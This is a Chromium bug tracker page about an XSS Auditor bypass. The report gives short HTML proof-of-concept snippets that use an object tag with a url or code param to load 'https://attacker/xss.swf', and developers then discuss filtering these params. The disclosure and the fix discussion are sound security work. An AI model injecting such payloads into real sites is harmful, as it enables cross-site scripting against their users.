New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 676992 link

Starred by 2 users

Issue metadata

Status: Duplicate
Merged: issue 783618
Closed: Nov 2017
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 3
Type: Bug

Show other hotlists

Hotlists containing this issue:

Sign in to add a comment

XSS Auditor bypass using object tag and url parameter

Reported by, Dec 26 2016

Issue description

I'd like to report an XSS Auditor bypass bug.
PoC is here:

<object allowscriptaccess="always">
<param name="url" value="https://attacker/xss.swf">

Could you confirm this bug?

Version 57.0.2962.0 (Official Build) canary (64 bit)
It seems it works via the name="code" also.

<object allowscriptaccess="always">
<param name="code" value="https://attacker/xss.swf">
Components: Blink>SecurityFeature
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Status: Assigned (was: Unconfirmed)
Thanks for the report. Tom, could you take a look when you get a chance?
Status: Started (was: Assigned)
Looks like there are few more <param> cases to cover.  Thanks for the report.
I'm also going to filter the allowscriptaccess attribute in <object>, just because, even though there's enough malice that can be accomplished even without it. is where we decide which name=xxx parameters are candiates for sanitization. has its own ideas about URL parameters. 

Mike, should we unify the two?  Have a suggestion about who else might weigh in on param element behaviour?
Mike: |allowscriptaccessAttr| token doesn't exist, can we add this to whatever IDL generates these?
Bouncing to mike to get some answers.  Pls re-assign to me afterwards.

Comment 9 by, Feb 23 2017

Labels: xssauditor

Comment 10 by, Feb 24 2017

Labels: OS-Android OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
I missed this, apologies:

1.  I don't think we handle `allowscriptaccess` in Blink today; we just hand all the params over to the plugin and let it figure out what it ought to be doing with them. Feel free to add it to `Source/core/html/HTMLAttributeNames.json5`.

2.  I think unifying the URL parameter behavior makes sense. Do you have a concrete suggestion for doing so?
Labels: Hotlist-EnamelAndFriendsFixIt
Mergedinto: 783618
Status: Duplicate (was: Started)
Oddly enough, this came in again recently.  Doing the uncool thing of duping the old into the new, because that's where the work is happening.

Sign in to add a comment